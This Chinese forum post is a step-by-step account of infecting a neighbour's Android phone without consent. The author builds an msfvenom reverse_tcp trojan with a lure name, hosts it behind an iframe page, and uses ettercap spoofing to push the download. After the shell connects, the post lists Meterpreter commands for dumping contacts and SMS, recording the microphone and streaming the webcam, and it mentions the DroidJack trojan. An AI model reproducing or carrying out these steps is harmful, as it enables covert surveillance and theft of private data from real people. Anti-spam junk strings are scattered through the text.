找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1622|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

- o& Q# Z8 d" U$ M. w 五、msf+ettercap入侵邻居安卓手机 % Q' }" E3 v; G3 [" y/ W5 e( k/ n

5 f% I& y* U2 X! a- |

7 u% @ Q. O2 [. B 首先启动msf & t1 i/ K& K0 q- O1 Y

$ K8 n# e6 v, f# A

5 B- \3 o1 Y p2 k* U 先用kali生成一个安卓木马,如下命令: ' I+ ]; P# S9 h

6 t1 Y' F& M; R. u5 ?& s4 S

) `7 |" j% R, C Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk & _" X9 h( e1 U- ]

' n' {% e% \$ B/ B

0 }, N& ^' g* C* R5 V" f0 y 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 5 }7 {" b' G( o; H! F0 H

" Q6 ]0 @ n( Q5 g( R* F# A3 K( K

& I- {/ U, {' g 然后进入msf & o4 l* X% h- n7 m

! E6 X* E6 q) G, C9 L

( a, k# Q- d; p3 E% j use exploit/multi/handler 6 D# i+ @: O! Y! q0 C. E

; u7 Z: R% n, D2 L& x# T6 n

% c/ B4 R" v8 y2 d, j4 D7 C set payload android/meterpreter/reverse_tcp 8 q" A. r, L5 H7 {7 C$ d7 |( b& L, L

1 l: {( i( p/ ]: O& }+ z

+ r. e8 s6 Z* ~# w0 l, d/ c9 B set LHOST 192.168.0.109 //ipkailiip : O0 X& `6 y9 K7 a3 b: p

$ B5 Q4 l3 S8 a4 Q2 }/ o

6 g2 I* U k' t V set LPORT 44444 //端口一定要与前面生成的木马的端口一致 H& F, U! E/ {# P* a' G

$ c C0 n d) c

* P8 a7 w- v& _* V Exploit - ]5 Z. j: [* a7 W' `

$ \0 s$ Y0 T4 i/ e$ o

7 y$ `8 J0 p( |# Q& O3 o7 o- w1 n   1 { a% H) j$ T/ r; ~5 x

" y5 s [5 @5 H/ X% {* R; H

: @% ], M; }2 I0 k0 }- g4 H 下面我们开启ettercap -G ) _: I! H4 A* F0 y

9 b) \/ D! G, c, K6 z; v) |/ D

+ t a/ ~5 ?! n6 R" c 我物理IP X9 {+ Y, u, X7 A

K7 |3 E$ t- Y8 i0 S \9 n6 w

& |$ C7 j& E$ @   * d2 Q" T9 C/ M3 i. x' M

, [ w5 {& i( [6 m

/ p2 `/ D; M5 j; K7 g 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, * \7 a, n' i+ r9 v0 b! } `

, \! L `" l2 _4 u2 l4 O: u

' w4 o! z w1 [ 下面我们来设置一下 " j# n# n7 A. A5 V

6 _" V2 D2 S' g$ e9 ]' s3 j8 J* s

; x6 ^; l* }6 c# Z* Z2 a3 ~4 y; t9 b   O! K, Y3 @6 S6 K h- {

- S6 ], R. z `" Q# D

8 |5 g$ K! A1 S5 k* S4 P 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ; s0 P5 l' y5 s5 B" g! A: Z

4 H; S1 k* g' R9 I

, K2 l1 c. s: } L8 i   ( q6 l' d' M* D k

2 `/ a. M8 c% f V

8 c; L, ~& g% x5 b& R D   0 U% a7 S+ d8 E5 D# a( Z% g+ e

( w) e$ v. r' g2 l$ {* H

. O9 n6 E% ^8 k# J6 g1 C   3 _; V9 |; K" i. f; B, i! K

( ^! {& s4 P7 S1 o

! T& o/ K3 Q3 y/ k; d" I s& J   ! h1 m% U* p/ |* B

4 r1 Q8 H2 E* J0 R. U5 G# }

U4 J. j1 @9 J2 S$ M   9 `5 c1 z, q& @+ O

# U% P0 E+ n, R$ T2 w' w- B

2 G$ `% [" `( |6 n: G   4 {7 A' B9 m% o4 n

0 k7 _1 _6 O5 w$ O" {( c: I: N6 e

9 B) z" r! n) A1 ~% e$ p7 o: g   9 H Y7 J1 \: u l7 I5 }) `

; s. p1 w. n" n3 v* K

$ R- ]' ~1 C- O   + t, n0 _9 i/ j& Z4 m$ n- @8 f

* y; v1 F( B6 ^+ N

; m% e) X' L( o' g, P   & q g4 {' B8 {+ x6 @' f4 u

$ ?2 q9 W- J. G3 J; P. s

/ ` U. o% x: k2 V2 A& `& n   ; C+ M! X' A' z4 T! O/ H

4 h. O) U: N9 L1 Q) J

, I) p2 u, |( ?5 _5 G1 ^   5 d$ h( }5 b1 u. j

) F3 S# B0 z+ `" ]7 P

3 L- @ O) g3 E* l5 k   0 u: \8 t5 Z3 _4 `% V

; j" K5 U5 o: x/ w

& S1 e& c/ K' \8 n0 O- ]" K n   - J, K! V( U0 L: p5 ?

: Q2 U& K3 d3 C: }

1 l$ e4 C, z* E 下面我们开始攻击 ; C0 L$ x0 y2 g) }! G

5 j7 H$ X/ Y. c8 W3 N& f) u9 }

" I/ \2 g7 f2 e   ! d$ s; A1 i |: _! j9 |! D

5 Y; H2 r/ u/ j: I( W0 Y

: m. j1 J' j: y6 ^   0 f! e% V" ]7 k1 s+ A% {

9 t, e) s3 P+ A* `* V% [7 A

# K6 J& r$ ^! V/ A s q   + h a0 q$ L. r( \: W5 p# l

% K7 V/ e/ r: B

, a& T' k/ e2 b1 E0 r V   $ O7 r8 D9 |3 `; ]0 |

, _4 w% f; @0 q& i$ b2 Q" S

2 o2 ~9 {& k& o) U* E& s8 o9 l   J+ I7 N( B1 o/ @5 `2 j

; P/ y1 S0 ?. |; ]) H5 \1 |

4 `) W0 Y3 j+ |9 a 大概过了5分钟多,发现反弹成功了 4 s& v$ t" y# k j

! O0 H E6 A5 d/ o l" q/ d

( @' q6 I3 e5 b! Q, b+ @, h+ M   s* a O }+ i1 z% X! `

: q, f' I) s9 H

+ ~$ k' h- m4 o8 \   . a. F" R! f0 ?* ~

6 H& c# Z$ B% ]+ r

. L; U7 _8 l4 X" a, q   6 W; e0 q7 m' z9 A2 I

- ?, y: p/ Q* \0 g, g

4 V: v# X+ ?! w2 F; v) i   " |) s( B4 O, x

* R2 `3 v# \" W3 U! x

# M' A9 S; a2 A2 t5 q/ z   : C" y" V! Z* a2 @& b2 o/ k

6 X2 i) v. q9 i- y5 {1 C

1 Y3 J5 ~6 s" D2 Z9 H9 B) L   1 y6 D( C' B) _' k+ V& Z! m& M

9 y6 a+ d. L' n: [" T& C

q/ h# m# ^5 m1 X1 ?3 f, | _   1 i' A0 s# r1 z7 K3 f! W+ | p

# Y4 S3 q, W, R/ S) A

$ ?* F7 L0 F. }7 y- { e6 u* ~; G 执行命令 , {0 F9 ~, m+ V' `6 {

7 ?! L7 p8 N+ Q |

4 h4 I% j1 S9 ^- P3 H. w0 S   & ^- f' F$ Y1 O: H

& ~. e3 t0 k* ^8 F" x

& Q4 C3 X: a5 }7 X* Q dump_contacts    --》这个是导出电话 5 b" D$ I& |5 d8 X4 z; Z

; l0 l* D" L* W- P) t% x

9 C0 o2 ]9 K& G( G8 S0 L dump_sms --》这个是导出信息 - n) K" D9 G. f4 g/ J, M" }3 z

f2 _5 J2 s U. V! R4 F

* C* w5 ~3 l2 o! }' X! B record_mic     Record audio from the default microphone for X seconds $ B8 i& {4 O/ r% `& `9 D

6 R& Z. Z- g, _ o4 c8 f* _

8 u1 d4 R; z. n& N     webcam_chat    Start a video chat . l) B: |5 N g9 f2 D: o: ?

0 p$ R9 {$ W6 m0 N0 G$ k

$ b6 q& ^! V$ u, P6 p     webcam_list    List webcams # e- w# w: {& I! F9 z' k

; i8 L2 t/ J# e: j

7 N5 D( }1 k D: L% `- J3 E' e     webcam_snap    Take a snapshot from the specified webcam . D4 V( s) j1 r1 B

* z" b- y& Y7 v! @6 @ \

- g$ ?0 S! I$ k9 F1 Y$ d$ N/ ^$ {& G, L webcam_stream  lay a video stream from the specified webcam 6 f$ z$ ?* T. k2 a, u' v2 X% a

) C; P7 ]' M; t

) S3 O6 I: w" y9 R   ' p& v/ J) }( w1 {% w* M" l

4 x, E( j- O4 G

1 W5 y2 O& a+ D& L* W: E   4 C1 m" I+ c' U$ E% P9 Q J

# w! [3 ~+ [% r/ w5 a) U

! I4 k. T6 n% @ 我们打开看一下电话薄, . [# f0 K% u. u* D

) Q: ~: q2 J- C% ~6 J+ P

" G7 R) T- G" x# { l" L" R7 B   4 t* z+ s- w7 n' a

/ x, D7 l$ @( x1 D; v5 d$ W

* N' r1 |$ R8 `% \   ; B3 k* a# N& u5 i3 J. ]

1 y( h* P1 C$ g

& o( s" E- b# D4 F2 B& A8 r* l' b   * i$ Q7 _9 ?& H. ]3 ]! s

3 c( [) \% F* Q. l

- |9 P; T: C5 l1 w( d0 V& g   6 X6 V( h* r1 Q5 Q, A0 o

/ [0 V$ I7 O6 X

) U( b3 G+ M/ h   R, v: D' o- P( t2 h

5 b" f& L+ B: { q9 z

" h9 t! ^* k: p. x   . o$ W5 n H+ L

2 ~% Q; c5 m* p

3 l) Q" `/ ?- u 我们同时欺骗成DroidJack木马,使用方法如图: 9 Y6 z( a" |- Y

. y# m0 p, a3 Y. K& m; q; A! f

# Q0 j6 S o, b% F   , g; J/ p- E. ~, }2 v

( {2 c5 H( Z7 F; P

' ?9 K$ N- g' V0 }- ^+ N   5 T3 L; R2 @& D7 ~# H. j; [& V

" q, \4 w1 r( Q7 r5 Z

3 \$ |0 ]0 s4 W( V$ e1 w   / Z% b, O/ h. }! @

$ X; |/ U+ Q" f9 y* B

. u8 j5 X0 s9 y: o) `9 t# J+ y H& t 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 4 i" G E/ k8 ~* s% V5 x H

, |7 H- P: m. s+ {

1 f' R2 n7 `( X   3 P. A# Z( w* I2 d: L1 u4 F3 y

. W* O2 s9 S/ h0 u7 A# \. \1 O

6 Y; v, Q& i0 k; ^9 h1 U. K* h   - K: a- l' X- Q

% D4 o6 v* @: A4 K

8 m' H2 r- {0 O& l   ' R" h$ C6 Y" b; B

) Q; {2 X( W+ B

7 e3 K5 d7 O6 u4 l8 C9 k ' X* S( `: \3 b( a

: `- f8 ]* ]; K( T

% o9 Z, k4 `6 z1 W% N8 }$ o
! o3 D5 d. x/ r/ q) }2 T1 Q5 n

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表